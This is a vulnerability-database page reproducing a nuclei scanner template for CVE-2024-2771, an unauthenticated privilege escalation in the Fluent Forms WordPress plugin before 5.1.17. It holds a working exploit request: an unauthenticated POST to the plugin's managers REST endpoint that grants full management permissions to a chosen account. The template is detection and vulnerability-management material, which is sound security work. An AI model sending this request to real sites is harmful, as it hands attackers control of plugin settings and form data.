Lucene search
K

Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

Unauthenticated privilege escalation in Fluent Forms before 5.1.17 via managers API, enabling management rights.

Related
Refs
Code
id: CVE-2024-2771

info:
  name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
  impact: |
    Unauthenticated attackers can grant Fluent Form management permissions to any user account, providing access to all plugin settings and sensitive data.
  remediation: |
    Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2771-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2771
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2771
    cwe-id: CWE-862
    epss-score: 0.02333
    epss-percentile: 0.81476
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/fluentform/"
    vendor: fluentforms
    product: contact_form
    framework: wordpress
  tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 5.1.17')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-json/fluentform/v1/managers HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate, br

        {
          "manager": {
          "email": "{{email}}",
          "permissions": [
        "fluentform_dashboard_access",
        "fluentform_forms_manager",
        "fluentform_entries_viewer",
        "fluentform_manage_entries",
        "fluentform_view_payments",
        "fluentform_manage_payments",
        "fluentform_settings_manager",
        "fluentform_full_access"
        ]
        }
        }

#exploit requires an existing user email address to work.

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Manager has been saved.','{{email}}')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 490a0046304402202f8e7cab919e9861784e305655831af3afa758e76d6aee0621d33e2cce09f7e3022033ad390c59f3714ffa2e35a6c3bdf23b4541c18ffb51882b1a32a5e0cf4c521d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.02333
SSVC
18